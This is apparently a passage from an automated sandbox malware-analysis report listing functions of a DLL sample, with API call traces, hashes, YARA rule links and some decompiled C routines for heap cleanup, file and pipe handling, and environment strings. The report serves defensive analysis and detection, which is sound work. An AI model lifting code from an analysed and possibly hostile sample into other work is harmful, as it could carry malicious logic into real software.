                • Instruction Fuzzy Hash: 83018431740306ABE3219F16EC48F777FE9EB90B52F00C029F6099A180F765AC55AF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D06BF Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D06CA
                • Sleep.KERNEL32(0000000A,?,?,?,046C8E76,00000000,?,00000029,046EE218,046C7EA7,?), ref: 046D06D4
                • SetEvent.KERNEL32(?,?,?,046C8E76,00000000,?,00000029,046EE218,046C7EA7,?), ref: 046D072B
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D074A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterEventLeaveSleep
                • String ID:
                • API String ID: 1925615494-0
                • Opcode ID: 064b0c89748a9cdef0fafa0811e07343c071f1cb7b7cec4280a49178417c192a
                • Instruction ID: 05b7757f8853a19d5c91d38e570d9861a9209c9bcb9b4564c0f9d42d84228ef5
                • Opcode Fuzzy Hash: 064b0c89748a9cdef0fafa0811e07343c071f1cb7b7cec4280a49178417c192a
                • Instruction Fuzzy Hash: DA0152B0B40205FBE700AFA2DC49B9A37E8EB15715F005411F609EF180F7BAED048BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3F41 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CAD65: lstrlen.KERNEL32(00000000,00000000,00000000,046D983E,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 046CAD6A
                  • Part of subcall function 046CAD65: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 046CAD7F
                  • Part of subcall function 046CAD65: wsprintfA.USER32 ref: 046CAD9B
                  • Part of subcall function 046CAD65: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 046CADB7
                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 046E3F6F
                • GetFileSize.KERNEL32(00000000,00000000), ref: 046E3F7E
                • CloseHandle.KERNEL32(00000000), ref: 046E3F88
                • GetLastError.KERNEL32 ref: 046E3F90
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                • String ID:
                • API String ID: 4042893638-0
                • Opcode ID: 98069e208d297d93991021e8457e006cbd8152b60c4063ede6305d85d7cf1c3b
                • Instruction ID: c427ceecc83241372bd77002f9d06581f757d4d5d3f07c643c450304d4cfdf75
                • Opcode Fuzzy Hash: 98069e208d297d93991021e8457e006cbd8152b60c4063ede6305d85d7cf1c3b
                • Instruction Fuzzy Hash: 6CF0D631206214BAD3202F66DC4CF6F7EACEF41760F108119F905D7280F634A581C6B4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E25FC Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(046EE0E0,00000000), ref: 046E2608
                • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 046E2623
                • lstrcpy.KERNEL32(00000000,?), ref: 046E264C
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046E266D
                  • Part of subcall function 046D1D5B: SetEvent.KERNEL32(?,?,046CCE97), ref: 046D1D70
                  • Part of subcall function 046D1D5B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,046CCE97), ref: 046D1D90
                  • Part of subcall function 046D1D5B: CloseHandle.KERNEL32(00000000,?,046CCE97), ref: 046D1D99
                  • Part of subcall function 046D1D5B: CloseHandle.KERNEL32(?,?,?,046CCE97), ref: 046D1DA3
                  • Part of subcall function 046D1D5B: RtlEnterCriticalSection.NTDLL(?), ref: 046D1DAB
                  • Part of subcall function 046D1D5B: RtlLeaveCriticalSection.NTDLL(?), ref: 046D1DC3
                  • Part of subcall function 046D1D5B: CloseHandle.KERNEL32(?), ref: 046D1DDF
                  • Part of subcall function 046D1D5B: LocalFree.KERNEL32(?), ref: 046D1DEA
                  • Part of subcall function 046D1D5B: RtlDeleteCriticalSection.NTDLL(?), ref: 046D1DF4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                • String ID:
                • API String ID: 1103286547-0
                • Opcode ID: 33c97bdb69696df03a3501144aba2b0d587fa49ccef94f86370cca62ffe5d57e
                • Instruction ID: 1a0025ab2acabb5d1bbc9d61eeace7ef025dadd82366054e9ed49fbb8ece0e27
                • Opcode Fuzzy Hash: 33c97bdb69696df03a3501144aba2b0d587fa49ccef94f86370cca62ffe5d57e
                • Instruction Fuzzy Hash: FFF0D131741211A7E7206A23EC09F563BA9EB85720F000425F204AB290FA66AC15CB74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D4ABB Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                Download Yara Rule
                APIs
                • lstrcatW.KERNEL32(?,?), ref: 046D4ACD
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
                  • Part of subcall function 046E36FE: CloseHandle.KERNEL32(00000006), ref: 046E37F1
                • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,046D718A,?,?,00001000,?,?,00001000), ref: 046D4AF0
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,046D718A,?,?,00001000,?,?,00001000), ref: 046D4B12
                • GetLastError.KERNEL32(?,046D718A,?,?,00001000,?,?,00001000), ref: 046D4B26
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                • String ID:
                • API String ID: 3370347312-0
                • Opcode ID: add598944a2d850439cd165d0d209c8b806f294f00faeae63b83f31706a8a967
                • Instruction ID: 1292c3338477892dfd20ad1a60d9d6cff8c9acd89a0a65feb728fdfb829728f0
                • Opcode Fuzzy Hash: add598944a2d850439cd165d0d209c8b806f294f00faeae63b83f31706a8a967
                • Instruction Fuzzy Hash: 98F0C831240204BBDB255F62EC0DF5A3B55EF24711F100004F601DA1D0FB79AD229B69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2B67 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                Download Yara Rule
                APIs
                • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,046D05CD,000000FF,04C9B7F0,?,?,046CD134,0000003A,04C9B7F0), ref: 046E2B83
                • GetLastError.KERNEL32(?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046E2B8E
                • WaitNamedPipeA.KERNEL32(00002710), ref: 046E2BB0
                • WaitForSingleObject.KERNEL32(00000000,?,?,046CD134,0000003A,04C9B7F0,?,?,?,046C902F,00000001,?), ref: 046E2BBE
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                • String ID:
                • API String ID: 4211439915-0
                • Opcode ID: 1ce208dfab62046ced216736e31f7fa76e6a258ef147eb0ff0f124c0a8d66d77
                • Instruction ID: 2b40f5386e617adcf916edd9c3348e6e3f1febb332d067c5043c9fb057e08456
                • Opcode Fuzzy Hash: 1ce208dfab62046ced216736e31f7fa76e6a258ef147eb0ff0f124c0a8d66d77
                • Instruction Fuzzy Hash: 3AF09631A01120ABE3302E67EC5CFA67FDAEB50775F114561F915EB2D0F2761C81CA60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CAD65 Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,046D983E,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 046CAD6A
                • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 046CAD7F
                • wsprintfA.USER32 ref: 046CAD9B
                  • Part of subcall function 046E2BDD: memset.NTDLL ref: 046E2BF2
                  • Part of subcall function 046E2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 046E2C2B
                  • Part of subcall function 046E2BDD: wcstombs.NTDLL ref: 046E2C35
                  • Part of subcall function 046E2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 046E2C66
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2C92
                  • Part of subcall function 046E2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 046E2CA8
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2CBC
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CEF
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CF4
                • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 046CADB7
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                • String ID:
                • API String ID: 1624158581-0
                • Opcode ID: fe39a5ff7f661ac7e1919fd986f787495a05c6c3a1500da33e39bd52290b4bc7
                • Instruction ID: 174d76eb2e16e9ecd50eb7a2c7eada13b301322b6242cba667967d6fd639600c
                • Opcode Fuzzy Hash: fe39a5ff7f661ac7e1919fd986f787495a05c6c3a1500da33e39bd52290b4bc7
                • Instruction Fuzzy Hash: 76F0B432601115BBD321671BFC08F677AEDDBC1721F141125F801DB290F668DC558A70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E31D0 Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E31D9
                • Sleep.KERNEL32(0000000A), ref: 046E31E3
                • HeapFree.KERNEL32(00000000,?), ref: 046E320B
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E3229
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 9828536a65d425411415ea1933915d4412b177ca79de617ac281214039844fb9
                • Instruction ID: 376f9fbc717474cee5ffcbd3e4ca9144607bda535883e7f6d8e8e49493a736eb
                • Opcode Fuzzy Hash: 9828536a65d425411415ea1933915d4412b177ca79de617ac281214039844fb9
                • Instruction Fuzzy Hash: E3F01730201201DFE7209F2BDC48F263BE4EB28340B049014F841DB252F23AFC99DA24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C120C0 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C120C0() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x1c1a2c4; // 0x10c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x1c1a314; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x1c1a2c4; // 0x10c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1c1a290; // 0x1d80000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                0x01c120c0
                0x01c120c7
                0x01c12111
                0x01c12113
                0x01c12113
                0x01c120cb
                0x01c120d1
                0x01c120d6
                0x01c120da
                0x01c120e0
                0x01c120e7
                0x00000000
                0x00000000
                0x01c120e9
                0x01c120ee
                0x00000000
                0x00000000
                0x00000000
                0x01c120ee
                0x01c120f0
                0x01c120f8
                0x01c120fb
                0x01c120fb
                0x01c12101
                0x01c12108
                0x01c1210b
                0x01c1210b
                0x00000000

                APIs
                • SetEvent.KERNEL32(0000010C,00000001,01C11B72), ref: 01C120CB
                • SleepEx.KERNEL32(00000064,00000001), ref: 01C120DA
                • CloseHandle.KERNEL32(0000010C), ref: 01C120FB
                • HeapDestroy.KERNEL32(01D80000), ref: 01C1210B
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: ab5e77551a5b6fbc8af0cd96ff727527cfc3e63054b0c07cdaaa4207982a449b
                • Instruction ID: 2265e2e4b69c7682c71c2a577cfd1e875cf58517b167793d4a731332027e116f
                • Opcode Fuzzy Hash: ab5e77551a5b6fbc8af0cd96ff727527cfc3e63054b0c07cdaaa4207982a449b
                • Instruction Fuzzy Hash: 30F012797C12219BEB309A7899487467AADBB27A517240110BE06D318DDA35C9009760
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3655 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E365E
                • Sleep.KERNEL32(0000000A), ref: 046E3668
                • HeapFree.KERNEL32(00000000), ref: 046E3696
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E36AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 7d10bccc36ab7fd2a155dcd470d3449814db3eb9fa117171da01c9d8e48b5f83
                • Instruction ID: dab4aad8bfbb300b8f81be82dbfcb9b7df194c426673ee1c2e74abfa4998e0c3
                • Opcode Fuzzy Hash: 7d10bccc36ab7fd2a155dcd470d3449814db3eb9fa117171da01c9d8e48b5f83
                • Instruction Fuzzy Hash: C4F0BC74201201DFEB089F2AE889E2977E5EB69740B04A019F802DB350F639FC948E24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C136C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C136C5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E01C123CC(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E01C16302(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E01C15173(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x1c1a290, 0, _t23);
				}
				return _t20;
			}









                0x01c136c5
                0x01c136d6
                0x01c136da
                0x01c13733
                0x01c136dc
                0x01c136e3
                0x01c136e9
                0x01c136f2
                0x01c136f6
                0x01c136fc
                0x01c1370c
                0x01c1371e
                0x01c1371e
                0x01c13729
                0x01c13729
                0x01c1373a

                APIs
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,021793D4), ref: 01C136FC
                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,021793D4), ref: 01C13729
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                • String ID: Ut
                • API String ID: 1500278894-8415677
                • Opcode ID: 2eecd87872044d97379bc1615edfd894ef072a030ccd52a340f3acc071d1ce2d
                • Instruction ID: bfa7261f0ded69b5caa7902a8ab62674edcf661fd34f4341c1bcfff47c5fa319
                • Opcode Fuzzy Hash: 2eecd87872044d97379bc1615edfd894ef072a030ccd52a340f3acc071d1ce2d
                • Instruction Fuzzy Hash: 0801F23214024AFBDB226F98DC44F8A7FBDFB86754F104024FA009A054DBB1D964E7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DD7C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,?,?), ref: 046DD80B
                • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 046DD81D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID: 0x
                • API String ID: 3510742995-3225541890
                • Opcode ID: 4b32c6941a82bcf5bdf7f44472cd4b2508b7234b578b2d1f61c5338d5a6d7ca6
                • Instruction ID: fae314ed19116d00650d758b65272da7c4ab401cb3fb06d2dc1b997ae9a3aa9b
                • Opcode Fuzzy Hash: 4b32c6941a82bcf5bdf7f44472cd4b2508b7234b578b2d1f61c5338d5a6d7ca6
                • Instruction Fuzzy Hash: 9C017175A0010ABFDB01EFA9C805AEEBBB9EB54740F004425E908E7240E7B5EA09CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11A11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C11A11(WCHAR* _a4) {
				long _t11;
				WCHAR* _t12;

				_t12 = 0;
				_t11 = ExpandEnvironmentStringsW(_a4, 0, 0);
				if(_t11 != 0) {
					_t12 = E01C12114(_t11 + _t11);
					if(_t12 != 0 && ExpandEnvironmentStringsW(_a4, _t12, _t11) == 0) {
						E01C12C11(_t12);
						_t12 = 0;
					}
				}
				return _t12;
			}





                0x01c11a1a
                0x01c11a24
                0x01c11a28
                0x01c11a33
                0x01c11a37
                0x01c11a46
                0x01c11a4b
                0x01c11a4b
                0x01c11a37
                0x01c11a52

                APIs
                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,02179CB5,00000000,01C11E60,00410025,00000005,?,00000000), ref: 01C11A22
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 01C11A3F
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                • String ID: pGt
                • API String ID: 1564683301-372155816
                • Opcode ID: 747f65c51a9b45964c22297b3fa675cb46853afbcd17267d0818f7836983584d
                • Instruction ID: db9395dde05172f5774c5ce01e31bd7b4fc9056c62296d9596e286f9031bfc4d
                • Opcode Fuzzy Hash: 747f65c51a9b45964c22297b3fa675cb46853afbcd17267d0818f7836983584d
                • Instruction Fuzzy Hash: 03E09233541573E24231D5BF8C44C4FDE9CEFA79E07190125BB04D3118D634C811E2E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DA76D Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046DA7C9
                • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,046C78A1,00000000), ref: 046DA817
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,046D0578,00000000,046C78A1,046C4652,00000000,046C78A1,046C5D2E,00000000,046C78A1,046C5D47,00000000), ref: 046DAB22
                • GetLastError.KERNEL32(?,00000000,?), ref: 046DAE22
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseErrorFreeHandleHeapLastmemset
                • String ID:
                • API String ID: 2333114656-0
                • Opcode ID: b12c4fec3ec76f564e75a4e8288453d7575e88a6483ecf77ce6ac32dfd987de9
                • Instruction ID: 5607025021279de7f416efa17c8ba06d5dbdc9042e462937e6e9b93780f5947b
                • Opcode Fuzzy Hash: b12c4fec3ec76f564e75a4e8288453d7575e88a6483ecf77ce6ac32dfd987de9
                • Instruction Fuzzy Hash: 3151DC32F48119BFEF216FE1CC40F7E3669DB45704F00442AF50696140FAB5B952EA66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D2169 Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D8EB0: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?), ref: 046D8ED4
                  • Part of subcall function 046D8EB0: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D8EE6
                  • Part of subcall function 046D8EB0: wcstombs.NTDLL ref: 046D8EF4
                  • Part of subcall function 046D8EB0: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?), ref: 046D8F18
                  • Part of subcall function 046D8EB0: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 046D8F2D
                  • Part of subcall function 046D8EB0: mbstowcs.NTDLL ref: 046D8F3A
                  • Part of subcall function 046D8EB0: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F4C
                  • Part of subcall function 046D8EB0: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F66
                • GetLastError.KERNEL32 ref: 046D2208
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D746E
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D7492
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,046CCFFD,?,?,?,?,?,?,?), ref: 046D74A0
                • HeapFree.KERNEL32(00000000,?), ref: 046D2224
                • HeapFree.KERNEL32(00000000,?), ref: 046D2235
                • SetLastError.KERNEL32(00000000), ref: 046D2238
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                • String ID:
                • API String ID: 3867366388-0
                • Opcode ID: edc7fb01610179929ce80f85674e3b2a76654352a95ac77af87e0a5533c0f268
                • Instruction ID: d884b4763dfa13a893f0321b2266117dcd613a2cbf5d414486182f1b9c4738bc
                • Opcode Fuzzy Hash: edc7fb01610179929ce80f85674e3b2a76654352a95ac77af87e0a5533c0f268
                • Instruction Fuzzy Hash: E5311C36900108FFDF129F99DC4489EBFB5FF58310B10455AFA15A7220E736AA61DF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CCF76 Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046E33E1: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E343A
                  • Part of subcall function 046E33E1: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3458
                  • Part of subcall function 046E33E1: RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 046E3481
                  • Part of subcall function 046E33E1: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3498
                  • Part of subcall function 046E33E1: HeapFree.KERNEL32(00000000,00000000), ref: 046E34AB
                  • Part of subcall function 046E33E1: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E34BA
                • GetLastError.KERNEL32 ref: 046CD015
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D746E
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D7492
